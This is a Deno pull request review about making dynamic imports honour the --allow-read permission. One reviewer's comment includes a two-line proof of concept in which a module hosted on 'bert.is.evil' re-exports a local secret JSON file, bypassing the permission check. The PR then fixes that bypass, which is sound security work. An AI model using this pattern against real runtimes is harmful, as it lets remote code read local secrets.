### PR TITLE
Dynamic import should respect permissions

### PR DESCRIPTION
**Pull request by ry**
Fixes https://github.com/denoland/deno/issues/2761

cc @kevinkassimo

### CODE REVIEW

**Comment by piscisaureus** [comment]
But what about indirect dynamic imports?

I think I can still bypass the --allow-read check:

```
await import('http://bert.is.evil/import_local.js');
```

And then I host `import_local.js` on `bert.is.evil`:

```
export * from 'file:///home/bert/juicy_secret.json';
```

That's because only the top-level dynamic import is checked for permissions, and its submodules don't go through the normal import machinery.

**Comment by ry** [comment]
@piscisaureus I believe I've fixed that problem now. See tests/error_016_dynamic_import_permissions2

**Comment by kevinkassimo** [comment]
LGTM for this PR, though I do start to think if the capability of importing JSON with static import is also problematic at times. It is totally possible for people to deduce file locations with common system hierarchy (e.g. under `/etc`).

I feel like maybe we should also add a `--no-json-import` flag, or somehow find a way to ban remote files from importing from local filesystem (which is very likely to be doing no good)

**Comment by ry** [comment]
> maybe we should also add a --no-json-import flag

Eh - this seems too specific and I don't think it's necessary either.

> somehow find a way to ban remote files from importing from local filesystem (which is very likely to be doing no good)

I agree. Certainly this isn't allowed in browsers?

**Comment by teleclimber** [comment]
> I do start to think if the capability of importing JSON with static import is also problematic at times. It is totally possible for people to deduce file locations with common system hierarchy (e.g. under /etc).

Definitely. I seems to me it does not matter whether an import is static or dynamic. If you're reading it you need an `allow-read` permission. Period.

File: cli/state.rs [hunk 1]
```diff
@@ -303,6 +311,30 @@ impl ThreadSafeState {
...
+        let filename = u
+          .to_file_path()
+          .unwrap()
+          .into_os_string()
+          .into_string()
+          .unwrap();
+        self.check_read(&filename)?;
+        Ok(())
+      }
+      _ => Err(permission_denied()),
```
Comment (piscisaureus) [inline cli/state.rs]: A "unsupported import url" or something error would be more appropriate here.

**Pull request merged**